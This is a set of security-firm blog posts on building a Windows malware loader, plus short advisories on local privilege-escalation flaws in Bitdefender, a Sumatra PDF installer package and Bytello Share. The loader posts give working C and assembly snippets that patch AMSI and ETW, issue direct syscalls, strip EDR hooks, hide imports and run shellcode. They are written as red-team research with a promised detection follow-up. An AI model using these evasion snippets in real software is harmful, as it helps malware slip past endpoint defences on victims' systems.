Search

Loader Dev. 4 – AMSI and ETW

Search
Blog article

Loader Dev. 4 – AMSI and ETW

In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Disclaimer

These posts are written to provide information to other professionals of the discussed topics.

The techniques used here are not novel and were documented by other people before. Therefore, the benefits of these posts for threat actors will likely be minimal. Nonetheless, we decided against releasing a full PoC implementation and will instead only provide code snippets as part of the posts. All credit should go to the people who did the original research on the techniques used.

There will also be an accompanying blog post on detecting or hunting for malware using the discussed techniques to enable readers to protect their environment.

Background

ETW

Event Tracing for Windows collects events from a process, which can then be retrieved e.g. by an EDR or AV solution. This could allow the detection of our payload. An article that discusses more details can be found here. An easy way to see the effect of patching ETW is using the process hacker after loading a C# assembly. The following screenshot was taken without patching ETW:

This screenshot shows that Rubeus was loaded into our process. If the Process Hacker is aware of this, an EDR can also detect it. The next screenshot shows the same window, but this time ETW was patched before the C# assembly was loaded:

Kolja Grassmann

Consultant

Category
Date
Navigation

As we can see, there is no information about the loaded assemblies available.

AMSI

AMSI is another feature provided by Microsoft. Here, an EDR or AV solution can register as a provider and will then get handed e.g. C# assemblies or PowerShell scripts before they are executed. This is done automatically e.g. while loading a C# assembly. Our payload would be unencrypted at this point and could therefore be detected.

As both ETW and AMSI are implemented in user space, we can interfere with them from there. Note, however, that attacking these features might lead to detection and it might make sense to use more creative solutions than we did in this post.

Patching functions

Like the hooks placed by EDRs, we can simply modify functions that are needed for ETW or AMSI. Note that both locations at which we are currently patching functions are well-known and patches at these locations will likely be detected by at least some EDRs.

ETW

For ETW, the NtTraceEvent syscall is used to turn over this information to the kernel from which it can be later retrieved. Therefore, patching this syscall in ntdll.dll so that it does not hand over the information should disable the feature. There are also other functions related to ETW, but the NtTraceEvent function seems to be central to the functionality of ETW and therefore a good option. A PoC can be found here. The implementation in our loader looks as follows:

// Get a handle to ntdll
HANDLE ntdll_handle = GetModuleHandle("ntdll.dll");

// Get the address of NtTraceEvent
LPVOID nttraceevent_address = GetProcAddress(ntdll_handle, "NtTraceEvent");

// We need a copy as ntprotectvirtualmemory might overwrite our address
LPVOID nttraceevent_address_copy = nttraceevent_address;

// Change the protections of the function so we can write
DWORD oldprotect = 0;
SIZE_T size = 4096;
pNtProtectVirtualMemory((HANDLE)-1, &nttraceevent_address_copy, &size, PAGE_EXECUTE_READWRITE, &oldprotect);

// Write a return opcode at offset 3
memcpy(nttraceevent_address+3, "\xc3", 1); // ret

// Change the protections back to the original ones
pNtProtectVirtualMemory((HANDLE)-1, &nttraceevent_address, &size, PAGE_EXECUTE_READ,&oldprotect);

AMSI

For AMSI, we can patch, for example, the AmsiScanBuffer function. The implementation currently looks very similar to the one for ETW, but we additionally need to ensure that amsi.dll is loaded:

// Get a handle to amsi.dll
HMODULE amsi_handle = LoadLibraryA("amsi.dll");

// Get the address of the AmsiScanBuffer function
LPVOID amsiscanbuffer_address = GetProcAddress(amsi_handle, "AmsiScanBuffer");

// We need a copy as ntprotectvirtualmemory might overwrite our address
LPVOID amsiscanbuffer_address_copy = amsiscanbuffer_address;

// Change the protections of the function so we can write
DWORD oldprotect = 0;
SIZE_T size = 4096;
NtProtectVirtualMemory((HANDLE)-1, &amsiscanbuffer_address_copy, &size, PAGE_READWRITE,&oldprotect);

// Write a return opcode at offset 3
memcpy(amsiscanbuffer_address+3, "\xc3", 1); // ret

// Change the protections back to the original ones
NtProtectVirtualMemory((HANDLE)-1, &amsiscanbuffer_address, &size, oldprotect,&oldprotect);

In our opinion, this is suspicious, as we are forcing a load of amsi.dll at a point where it is not needed. A better strategy would be to invoke legit functionality, which causes amsi.dll to be loaded, and to then patch it after it was loaded.

Vectored Exception Handling

There is a blog post by EthicalChaos, which discusses evading AMSI without making changes to the process memory. This works by setting a hardware breakpoint on the previously discussed functions and then using a Vectored Exception Handler to handle this hardware breakpoint. Our exception handler can then force the function to return and specify a return value indicating that everything went well. There is an implementation of this in which details can be seen.

Library Loads (AMSI)

Another idea for disabling AMSI is to prevent amsi.dll from being loaded. This could e.g. be done by adding a hook to LdrLoadDll in ntdll.dll to filter the DLLs we allow our process to load. This is done by batsec in a sample solution.

Summary

In this post, we looked at disabling ETW and AMSI for our process, which is especially relevant for loading C# executables. In the next post, we will finally be discussing how to load our actual payload and how well the loader fares against security products.

Further blog articles

Do you want to protect your systems? Feel free to get in touch with us.

Loader Dev. 3 – Evading userspace hooks

Search
Blog article

Loader Dev. 3 – Evading userspace hooks

In this post, we will go over techniques to avoid hooks placed into memory by an EDR.

Disclaimer

These posts are written to provide information to other professionals of the discussed topics.

The techniques used here are not novel and were documented by other people before. Therefore, the benefits of these posts for threat actors will likely be minimal. Nonetheless, we decided against releasing a full PoC implementation and will instead only provide code snippets as part of the posts. All credit should go to the people who did the original research on the techniques used.

There will also be an accompanying blog post on detecting or hunting for malware using the discussed techniques to enable readers to protect their environment.

Hooks

We will start by discussing how hooks work. This information will serve as background knowledge for the later sections in which we will explain how to circumvent these hooks.

IAT Hooks

One way to hook functions is to replace the address of the function in the Import Address Table (IAT) with the address of the hooking logic. If our executable then uses the IAT to resolve a function, it will invoke the hooking logic instead. However, this is not that relevant for our purposes here, as we are not using the IAT for our function resolution. Our understanding is that most EDRs are preferring trampoline hooks over IAT hooks. We will discuss trampoline hooks in the next section.

Inline/Trampoline hooks

Instead of hooking the IAT, we can also overwrite the start of a function with a jump to our hooking logic. If the function is then called, the jump to our logic is executed first and we can analyze the function call before handing over the execution to the original logic. This is shown in the following figure:

Hooks in the real world

So let’s have a short look at how this looks in the real world. For this, we will use an unnamed EDR, which hooks certain functions. One hooked function is NtCreateThread. Let us first look at this function without the hook in place:

Kolja Grassmann

Consultant

Category
Date
Navigation

With the hook in place the function looks as follows:

As we can see, there is an unconditional jump added at the start of the functions. In this case, the remaining space is filled with int3 instructions. Note that there are more instructions in the second screenshot, as instructions can differ in size on Intel architectures. The jump will allow the EDR to analyze our function call and its argument before doing the actual NtCreateThread syscall.

Avoiding hooks

Now that we have covered how EDR products might hook certain functions, we will start discussing how to avoid these hooks.

Moving to lower-level functions

In many cases, the functions documented by Microsoft and used by most programmers like VirtualProtect are a wrapper to lower-level functions and provide a more convenient and stable interface for them. With VirtualProtect, the actual call stack when interacting with the kernel, which changes the protections, is as follows:

As we can see, we could also use the NtProtectVirtualMemory function directly instead of VirtualProtect. Note that we are sacrificing some convenience here and that undocumented functions might be changed by Microsoft at any point.

In the past, some EDRs did only hook functions at a higher level. Therefore, it was possible to avoid hooks by calling lower-level functions directly. By now, in most cases, hooks are also placed in ntdll.dll, which is the interface between user space and the kernel. Therefore, it is generally no longer possible to avoid hooks by moving to lower-level functions.

Loading a second copy

Another strategy to avoid hooks is to load another copy of the used DLL into memory and then use the second copy for our calls. However, this has the disadvantage that loading the copy into memory alone could be detected and deemed malicious. Therefore, if we do not have a way to do it without encountering hooks, this might not work. It also leaves the obvious indicator of compromise, that there are two loaded copies of ntdll.dll.

Direct syscalls

Functions in ntdll.dll are mostly just a wrapper to syscall instructions, which place the appropriate syscall number into the rax register and hand over control to the kernel. We can see this in the following screenshot, which shows the NtProtectVirtualMemory function:

We can replicate this by using our syscall instruction with the right syscall number. Therefore, our next step will be finding the syscall number for the syscall we want to do.

1. Hardcoding the syscall numbers

One way to gather the syscall numbers is to look at the ntdll.dll file and create a mapping between the function we want to invoke and the syscall number. Unfortunately, the syscall numbers depend on the build of Windows and we can therefore only hardcode them if we know the specific version of Windows we are targeting. This approach is used e.g. by SysWhispers.

2. Parsing ntdll.dll dynamically

We could also parse the syscall numbers from the ntdll.dll present on the system, which would then be the correct numbers for the targeted build version. One way to do this is to use the copy already mapped into memory to retrieve the syscall number, as is done by HellsGate. Here, however, we again face the problem that this copy might be hooked and therefore might no longer contain our syscall numbers.

We could also retrieve a clean copy of ntdll.dll from disk. However, opening a fresh copy of ntdll.dll might be suspicious and could be detected by the EDR, as we are using the hooked logic to open the file.

As with unhooking, at which we will take a closer look later in this post, an alternative way here could be to create a suspended process and read the clean copy of e.g. ntdll.dll from its memory before an EDR had the opportunity to place its hooks. Again, the main issue here is that the functions we would use are potentially hooked, which could lead to us being detected.

3. Using function order in memory

Fortunately, we can also find the syscall numbers dynamically by relying on the order of the syscalls in memory. The syscall numbers are sequential in memory, as can be seen in the following screenshot:

As you can see, the functions following each other in memory also have sequential syscall numbers (0x4c-0x50).

There are two strategies, that we are aware of, that use this order to retrieve the syscall numbers. The first one is Halo’s Gate, which we learned about in the course material from Sektor7. This strategy is basically the same as with HellsGate, but instead of parsing the syscall number from the copy in memory and stopping if a hook overwrote the syscall number, we are continuing our search in the function above and below the function for which we want to retrieve the syscall number. The offset to these functions is always 32 bytes and if we find their syscall numbers, we can use the current overall offset used in our search to calculate the syscall number we are searching for.

One disadvantage of Halo’s Gate is that we still need to find a syscall number in memory. While this is likely possible as not all functions will be hooked, it could still be prevented by an EDR that hooks all functions in ntdll.dll. Instead, we can use the method used by FreshyCalls (this is a fork as we did not find the original repo). The basic idea here is that we sort all function names by their address. Afterward, we can search this list for our function name and will be able to use the index into our list of sorted function as the syscall number. As we are not relying on reading the syscall address from memory, this should work even if they have all been removed from memory as long as the order does not change (which is not a given, as Microsoft could change this with every update). As this is one method we decided to port to C, we will cover this in more detail here.

Like FreshyCalls, I defined a struct that contains the mapping between the syscall name and address:

// Struct holding the syscall name and its address
struct SYSCALL_ENTRY {
    char* name;
    DWORD address;
};
// Struct holding the number of found syscalls, as well as the ntdll.dll base address and an array of SYSCALL_ENTRY structs
struct SYSCALL_LIST {
    DWORD size;
    char* pBaseAddress;
    struct SYSCALL_ENTRY entries[MAX_SYSCALL_ENTRIES];
};

We initially fill this with all functions in ntdll.dll (see part 2 for a more detailed description) that start with nt, but not with ntdll (ignoring case):

DWORD* Functions = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfFunctions);
DWORD* Names = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfNames);
WORD* Ordinals = (WORD*)(pBaseAddr + pExportDirAddr->AddressOfNameOrdinals);
DWORD j = 0;
for (DWORD i=0; i < pExportDirAddr->NumberOfNames; i++) {
    char* FunctionName = pBaseAddr + Names[i];
    if([...]) { // Starts with nt, but not ntdll
        syscall_list.entries[j].name = FunctionName;
        syscall_list.entries[j].address = Functions[Ordinals[i]];
        j++;
    }
}
syscall_list.size = j;
syscall_list.pBaseAddress = pBaseAddr;

Finally, we will sort all the entries by their address:

for (unsigned long i = 0; i < syscall_list.size - 1; i++) {
    for (unsigned long j = 0; j < syscall_list.size - i - 1; j++) {
        if (syscall_list.entries[j].address > syscall_list.entries[j + 1].address) {
            // Swap entries.
            struct SYSCALL_ENTRY TempEntry = {};
            TempEntry.name = syscall_list.entries[j].name;
            TempEntry.address = syscall_list.entries[j].address;
            syscall_list.entries[j].name = syscall_list.entries[j + 1].name;
            syscall_list.entries[j].address = syscall_list.entries[j + 1].address;
            syscall_list.entries[j + 1].name = TempEntry.name;
            syscall_list.entries[j + 1].address = TempEntry.address;
        }
    }
}

The index at which our function is located is the syscall number that we are searching.  Therefore, we can iterate over our structure as follows and return the syscall number when we find our function:

for (DWORD i=0; i < syscall_list.size; i++) {
    if ( strcmp(syscall_name, syscall_list.entries[i].name)== 0) {
        return i;
    }
}

4. Using Vectored Exception Handling

Another option would be to call our syscall using non-malicious arguments with the hooks in place so that no detection is triggered. Before doing the call, we set a breakpoint at the syscall instruction and use Vectored Exception Handling to handle this breakpoint. Even if the EDR has removed the syscall number from the ntdll.dll memory, it will be placed in EAX before the syscall. So, when our exception is triggered the right syscall number will be in EAX and we can retrieve it in our exception logic. This is described by rad98 in this blog post.

5. Doing the syscall

Using the syscall number, we can replicate the behavior of the function present in ntdll.dll. For this, SysWhispers does ship a syscall instruction. This, however, seems like an easy pattern that AV software could check for, as there is no reason to use this instruction in an executable. In our understanding, it should only be present in ntdll.dll. Instead, we can use a gadget from ntdll.dll, which our code jumps to when performing the actual syscall as done by FreshyCalls. This has the additional advantage that the call originates from ntdll.dll, which could be beneficial if the call stack is checked by an EDR in the kernel.

For this purpose, we implemented logic that searches ntdll.dll for a syscall instruction. We can start at the address of our target function and then search for a syscall instruction as follows:

for(int i = 0; i < 200; i++) {
    if(*( function_base_address + i) == 0x0F && *(function_base_address + i +1) == 0x05) {
        return (unsigned char*) (function_base_address + i);
    }
}

This is not a clean solution, as we are relying on the fact that the instructions are present either in our function or in one of the functions located directly afterwards. It would be cleaner to search specifically within our function and then start at the beginning of the .text segment in order to find a syscall instruction if there is one present. Changing this is still on our TODO list.

As the loader uses MinGW, we can use the following code to store our syscall gadget and the syscall number in the required registries:

register unsigned char* syscall_gadget asm("r11") = tmp_syscall_gadget;
register unsigned int syscall_number asm("rax") = tmp_syscall_number;

Afterward, we can use the following assembly stub to execute the syscall:

// At the beginning of our function we ensure, that all arguments are saved on the stack (assuming stdcall calling convention)
// Here we put them into registers again, as our logic will likely have clobbered the original values
movq 0x10(%rbp), %rcx // restore first argument
movq 0x18(%rbp), %rdx // restore second argument
movq 0x20(%rbp), %r8 // restore third argument
movq 0x28(%rbp), %r9 // restore fourth argument. Everything after this is passed on the stack anyway.

mov %rcx, %r10 // replicate normal syscall stub behaviour
mov %rbp,%rsp // get rid of local variables, which we no longer need
pop %rbp  // restore base pointer
jmp %r11  // jmp to our gadget

This logic makes some assumptions on how our compiler implements the function (e.g. that rbp is stored on the stack). We verified that this is indeed the case in our implementation. However, future versions of the compiler or different implementations might need some adjustments here.

As we are directly calling the syscall from our code, which will not have been hooked by the EDR, this avoids any hooks that might have been placed in user space.

Unhooking

Using direct syscalls is often inconvenient and might lead to a lot of maintenance, as these interfaces might change at any time. Therefore, we should keep our usage of direct syscalls to a minimum. Furthermore, the payload we load will likely use the Windows APIs, which an EDR will still have hooked at this point.

The hooks will likely be placed by the EDR during the initialization of our process or when a new library is loaded. As discussed before, these hooks are most likely trampoline hooks, which are placed at the beginning of the targeted functions. As the functions reside in userspace, we can overwrite them ourselves, too. This means, that we can revert the changes made by the EDR to the function instruction, which is basically what we will be doing when unhooking our process.

IAT Unhooking

As discussed initially, one way to hook functions is by overwriting function addresses in the IAT. Because this seemed less relevant, we decided against integrating this for now. If you are searching for inspiration, have a look at this project, which implements IAT unhooking. There is also an accompanying blog post, which we highly recommend, that explains what we are doing. To summarize the post: We would iterate over the IAT and recalculate the function addresses by looking at the Export Address Table (EAT) of the DLL implementing the function. If the function address differs, we then overwrite the presumably hooked address with our newly calculated one.

Removing inline hooks

To remove inline hooks, we first need access to a clean version of the DLL. We can retrieve a clean version of the DLL from the original file on disk, as the DLLs are only hooked during runtime. Another option would be to start a suspended process and retrieve a clean version of the loaded DLLs before the EDR had the opportunity to hook them. For DLLs included as \KnownDlls\, it is also an option to call NtOpenSection to get a section handle, which can then be used to map the DLL into our process. The \KnownDlls\ entries are a caching mechanism for the more important DLLs used by the system, this technique works e.g. for ntdll.dll.

After we have a clean copy of our target DLL, we then use it to remove any hooks from the .text section of the DLL loaded by our process. The simplest way to do this is to overwrite the complete text section with the clean version. This works well for ntdll.dll; however, I am not sure if it is the best approach for other DLLs. A more fine-grained approach is to check if a hook is in place for each function and then only overwrite the hook if that is the case.

In our case, the implementation was heavily inspired by this code, as this seemed to be the simplest way to archieve the unhooking using only direct syscalls. It uses the \KnownDlls\ path and checks for a jmp at the beginning of each function to evaluate if a certain function is hooked. If this is the case, the start of the function is overwritten with the instructions from the clean version of the DLL. I decided to only unhook kernel32.dll, kernelbase.dll and ntdll.dll. In a future version of the loader, it might be nice to unhook all loaded DLLs. However, we suspect that with these three DLLs, most of the hooks encountered in practice should be covered.

After we have executed this, we should no longer have hooks in our loaded DLLs and should therefore be harder to detect even when using functions provided by the loaded DLLs instead of direct syscalls. Note, however, that the removal of hooks itself might be an indicator of malicious intent and therefore we need to evaluate whether unhooking makes sense in our use case.

Dynamic unhooking

While looking into this topic, we found an implementation of dynamic unhooking by @mgeeeky. The idea here is that instead of unhooking the DLLs we consider relevant at the beginning of our execution, we integrate the unhooking logic into our dynamic function resolution logic (see part 2 of this series). This way we can dynamically unhook only the functions we use, which should be much stealthier. This will make it harder to check if the hooks are still in place, as most hooks will indeed be. Therefore, this seems like a great idea; however, as our payload is not aware of our dynamic function resolution logic, this seems less relevant for developing a loader than e.g. for a custom C2 framework. To make this work within a loader, we would need to ensure that the payload uses this dynamic function resolution logic, which does not seem trivial and which we therefore decided against.

Kernel level detections

The hooks placed by the EDR, which we discussed previously, are located in user space. There is, however, also the possibility that the logic detecting us resides in kernel space. This logic could then e.g. detect our direct syscalls or our function call after we removed the hooks.

Kernel Callbacks

Drivers can register callbacks for some events in the kernel, like the creation of a new process. An EDR that ships with a kernel driver could register such a callback and react to the event. There was a non-comprehesive list of kernel callbacks linked in this awesome series on C2 development.

ETW TI

Another component in the kernel that might still lead to detection is ETW TI. This is a component implemented by Microsoft and therefore heavily used by their EDR, while other EDRs are, to the best of my knowledge, just starting to use it. It is a version of ETW that is implemented in the kernel and logs information about events triggered by a process. I found this blog post helpful for gaining a bit more insight into ETW TI.

Call Stack Spoofing

One thing an EDR could look at to detect direct syscalls or the malicious use of functions is the call stack of the call. If the call stack does not contain the expected calls or contains suspicious addresses that, for example, are not backed by a file, this could lead to detection.

There are multiple projects to avoid this: There is, for example, an implementation by mgeeky, that places a 0 into the call stack of a sleeping thread to stop the unwinding process. There is also this blog post, which discusses spoofing a call stack using a new thread to make an unsuspicious syscall. An other implementation is a part of AceLdr, which uses a jmp gadget to avoid calls from a suspicious location.

EDR Sandblast

EDR Sandblast is a tool that uses a vulnerable driver to execute code in the kernel. It can then remove any kernel callbacks and also deactivate ETW TI. This tool is quite powerful and has other features as well. However, Microsoft is starting to lock down the loading of drivers by requiring them to be signed and by introducing a blacklist for vulnerable drivers. Therefore, if the target system is sufficiently hardened, we might need a custom signed driver or an exploitable zero-day in another driver to use a similar approach.

Summary

In this post, we took a quick look at how hooks work. We then discussed how to evade them using direct syscalls. Here we covered different options for resolving syscall numbers. Afterwards, we discussed unhooking, which will be useful to ensure that our payload stays undetected during execution, as these hooks would likely allow an EDR solution to recognize some of our payloads by their call patterns. In the next post, we will discuss evading AMSI and ETW to ensure that our payload is even harder to detect during runtime.

Further blog articles

Do you want to protect your systems? Feel free to get in touch with us.

Vulnerability in Bitdefender (CVE-2023-6154)

Search

Vulnerability in Bitdefender (CVE-2023-6154)

Bitdefender produces different antivirus products. The privilege escalation vulnerability existed in Bitdefender Total Security, Internet Security, Antivirus Plus and Antivirus Free.

Local Privilege Escalation Vulnerability in Bitdefender

The fixed vulnerability allowed an attacker to escalate his privileges to SYSTEM on a system that the attacker already had access to.

This was possible by using COM-Hijacking to execute code in the context of a trusted front-end process. The trust between the front end and the back end was then abused to write registry values as SYSTEM, allowing an attacker to execute code as SYSTEM.

We want to thank Bitdefender for their exemplary reaction to the vulnerability report.

CVSS Score
7.8 (CVSS v3) – https://nvd.nist.gov/vuln/detail/CVE-2023-6154

CVSS Vector String
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected Versions
Total Security: 27.0.25.114; Internet Security: 27.0.25.114; Antivirus Plus: 27.0.25.114; Antivirus Free: 27.0.25.114.

Fixed Version
27.0.25.115

References
https://www.bitdefender.com/support/security-advisories/local-privilege-escalation-in-bitdefender-total-security-va-11168/

Credits
Kolja Grassmann (cirosec GmbH) and Alain Rödel (Neodyme)

Timeline

Do you want to protect your systems? Feel free to get in touch with us.

Loader Dev. 2 – Dynamically resolving functions

Search
Blog article

Loader Dev. 2 – Dynamically resolving functions

In this post, we discuss dynamically resolving functions, which help to avoid static detections based on the functions imported by our executable.

Disclaimer

These posts are written to provide information to other professionals of the discussed topics.

The techniques used here are not novel and were documented by other people before. Therefore, the benefit of these posts for threat actors will likely be minimal. Nonetheless, we decided against releasing a full PoC implementation and will instead only provide code snippets as part of the posts. All credit should go to the people who did the original research on the techniques used.

There will also be an accompanying blog post on detecting or hunting for malware using the discussed techniques to enable readers to protect their environment.

Imports

The functions our executable uses are by default easily viewable in its imports section. The following code could be used in a basic loader:

#include <stdio.h>
#include <windows.h>

int main() {
  unsigned char shellcode[] = [...];
  unsigned char* base_address = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  memcpy(base_address, shellcode, sizeof(shellcode));
  ((void(WINAPI*)(void))base_address)();
}

After compilation, we can view the imports of our executable e.g. using PE-bear:

Kolja Grassmann

Consultant

Category

Date

Navigation

Note that the VirtualAlloc function is imported by our executable. AV solutions consider these imports when evaluating whether our executable is malicious. Therefore, we should avoid suspicious function imports like the VirtualAlloc function.

Dynamic function resolution

It is possible to dynamically resolve function addresses by using the GetModuleHandle or LoadLibraryA and GetProcAddress functions. By using these functions, we could avoid importing VirtualAlloc:

#include <stdio.h>
#include <windows.h>

int main() {
  unsigned char shellcode[] = [...];
  unsigned char* base_address = (unsigned char*(WINAPI*)(LPVOID,SIZE_T,DWORD,DWORD))GetProcAddress(GetModuleHandle("Kernel32.dll"), "VirtualAlloc")(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  memcpy(base_address, shellcode, sizeof(shellcode));
  ((void(WINAPI*)(void))base_address)();
}

As can be seen in the following screenshot, the VirtualAlloc function is now no longer imported, but the functions used for resolving it will be imported:

These functions themselves might be considered suspicious; therefore, it is better to implement a custom version of these functions by parsing the PE structure manually to resolve functions. We will go over this in the following section.

Custom implementation

In this section, we will cover how to manually resolve a function. As with the GetModuleHandle and GetProcAddress functions, we will need to know the name of the function and the DLL the function is exported by. Our implementation uses the actual name of the function or DLL. However, there are other implementations out there that use hashes of the DLL and function names instead. This has the advantage that these implementations do not ship the function names in their executable, which might be suspicious. To archive a similar effect, we chose to encrypt the strings in the code used by our loader instead of using a hash.

Custom GetModuleHandle()

The first step is to resolve the loaded module using the DLL name. For this, we will first take a look at the Thread Environment Block (TEB), which is stored in the GS register on 64bit systems. At offset 0x60 there is a pointer to the Process Environment Block (PEB) located in the TEB.

typedef struct _TEB {
  PVOID Reserved1[12];
  PPEB  ProcessEnvironmentBlock;
  [...]
} TEB, *PTEB;

In the PEB we will find a pointer to a PEB_LDR_DATA structure:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  [..]
} PEB, *PPEB;

This structure then contains a list of the modules that are loaded by the current process:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

The LIST_ENTRY structure is a doubly linked list, which is defined as follows:

typedef struct _LIST_ENTRY {
   struct _LIST_ENTRY *Flink;
   struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;

Each of these LIST_ENTRY structs is part of an LDR_DATA_TABLE_ENTRY. The structure provided by Microsoft is as follows:

typedef struct _LDR_DATA_TABLE_ENTRY {
    PVOID Reserved1[2];
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

However, we can find a more complete structure in the ProcessHacker source code. Here we see, that directly after the FullDllName there is also a BaseDllName. Our understanding is, that the FullDllName should include the full path, while the BaseDllName does not and therefore, the BaseDllName is more convenient for our use case.

We can compare the BaseDllName to the module we are searching for and return the DllBase field if we find our DLL. If we end at the LIST_ENTRY structure we initially found in the PEB, then we have looked at all modules without finding the target DLL and should return NULL to indicate that we have not found the module.

Custom GetProcAddress()

With the handle to our module, we then can resolve an actual function as GetProcAddress would do. Again, we will traverse several different structures to find the relevant fields. The first structure we will look at is the IMAGE_DOS_HEADER structure. The definition can e.g. be found in the ReactOS source code:

typedef struct _IMAGE_DOS_HEADER {
    [..]
    LONG e_lfanew; // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

The last field here is named e_lfanew and contains the offset to the IMAGE_NT_HEADERS structure, which we need to look at next. Our understanding is that the IMAGE_DOS_HEADER structure is a legacy structure and for most purposes, we will move on to the IMAGE_NT_HEADER. The definition for this structure looks as follows:

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

Of interest to us is the OptionalHeader field. The definition looks as follows:

typedef struct _IMAGE_OPTIONAL_HEADER64 {
  [...]
  IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;

Here we specifically want to look at the DataDirectory field, which is the last field. The definition looks as follows:

typedef struct _IMAGE_DATA_DIRECTORY {
  DWORD VirtualAddress;
  DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

This is an array and there are multiple entries here that are at specific offsets. The offset that is of interest to us is IMAGE_DIRECTORY_ENTRY_EXPORT, which contains the exported functions. The value contained here is an offset from the base address of our module. Using the base address and this offset, we can find the IMAGE_EXPORT_DIRECTORY structure for which ReactOS again has a definition:

typedef struct  IMAGE_EXPORT_DIRECTORY {
  [...]
  DWORD NumberOfFunctions;
  DWORD NumberOfNames;
  DWORD AddressOfFunctions;
  DWORD AddressOfNames;
  DWORD AddressOfNameOrdinals;
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

The AddressOfNames, AddressOfNameOrdinal, and AddressOfFunctions fields are again an offset from the base address of the module. This is also called a Relative Virtual address (RVA). The AddressOfNames field points to an array containing the function names of the exported functions. The NumberOfNames field contains the number of function names that are contained in this array. We can iterate over these names and compare them to the name of the function we are searching for. If we find our function, we can then use the offset we found the name at to locate the ordinal that belongs to our function in the AddressOfNameOrdinals array. The ordinal can then be used as an index into the AddressOfFunctions array to find the address of our function, in most cases allowing us to return the address of the function as GetProcAddress() does.

In some cases, the function is forwarded to another DLL. In our use case here, we are looking up the DLL name for our own implementation, so this is somewhat unlikely and we could likely fix it by providing the name of the DLL that our call gets forwarded to. However, if we want to consider this in our implementation, we can recognize it, as the function pointer we retrieve in the final step should in this case point to a string in our IMAGE_EXPORT_DIRECTORY structure. Thus, we can compare the limits of this structure using the Size field from our IMAGE_DATA_DIRECTORY structure with our pointer to see if this is the case and then handle these cases differently.

If the function is forwarded, our understanding is that the address of our functions points to a string of the form DLLNAME.FUNCTIONNAME. Therefore, we can parse this string and then invoke our logic again with the new DLL and function name.

A full implementation of the discussed logic can e.g. be found in @C5pider’s KaynLdr .

Strings

As already mentioned before, the strings that we use to dynamically resolve the used functions can give an indication that we are trying to hide a suspicious import. We can manually find these strings using the string command on Linux:

$ strings basic_loader.exe | grep "Virtual"
VirtualAlloc
  VirtualQuery failed for %d bytes at address %p
  VirtualProtect failed with code 0x%x
VirtualProtect
VirtualQuery
    VirtualAddress
VirtualSize
VirtualAddress
VirtualSize
VirtualProtect
VirtualQuery
VirtualAddress
VirtualQuery
VirtualProtect
__imp_VirtualProtect
__imp_VirtualQuery

As can be seen, the VirtualAlloc function is still visible here and a security product could easily recognize what we are up to. As mentioned before, one way to get around this is to use hashes instead of the function name to find the function we want to resolve. However, these hashes themselves might be an indicator of malicious intent if they are frequently used by malware. Therefore, it would be advantageous to use a less known hash algorithm here.

Another option is to encrypt the strings and decrypt them during runtime. This is the route we went in our loader.

Summary

In this blog post, we discussed imports and their usage for static analysis by AV solutions. We then went over the structures and fields we need to look at to resolve a module similar to GetModuleHandle() manually. Subsequently, we did take a look at resolving a function using a function name and a pointer to the module in memory as done by GetProcAddress(). Finally, we briefly mentioned the need for obfuscating the function names that we want to resolve. The structures seen in this post will be relevant again in the following posts.

Further blog articles

Do you want to protect your systems? Feel free to get in touch with us.

Vulnerability in neo42 Sumatra PDF Package

Search

Vulnerability in neo42 Sumatra PDF Package

Sumatra PDF is an open-source PDF reader. The vulnerability was found in the installer for this product shipped by neo42 for Matrix 42 Unified Endpoint Management.

Local Privilege Escalation Vulnerability in neo42 Sumatra PDF Package

The installer package used a folder that was writeable by unprivileged users to store executables. An attacker with access to the system could have manipulated these executables to gain SYSTEM privileges.

The vulnerability was acknowledged and fixed by neo42 within 4 weeks. We want to thank neo42 for their exemplary reaction to the vulnerability report.

CVSS Score
7.8 (CVSS v3)

CVSS Vector String
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected Version
neo42 Sumatra PDF Package Version 3.4.6.0

Mitigation
The vulnerability can be resolved by using the newest version of the installer provided by neo42.

Credits
Kolja Grassmann (cirosec GmbH)

Timeline

Do you want to protect your systems? Feel free to get in touch with us.

Vulnerability in Bytello Share

Search

Vulnerability in Bytello Share

Bytello Share is a software used to share the screen of a device. The vulnerability was found in the installation process of the software.

Local privilege escalation vulnerability in Bytello Share Installer

The installer uses a folder that is writeable by unprivileged users to store executables and DLLs. An attacker with access to the system can manipulate the files during the installation process to gain SYSTEM privileges.

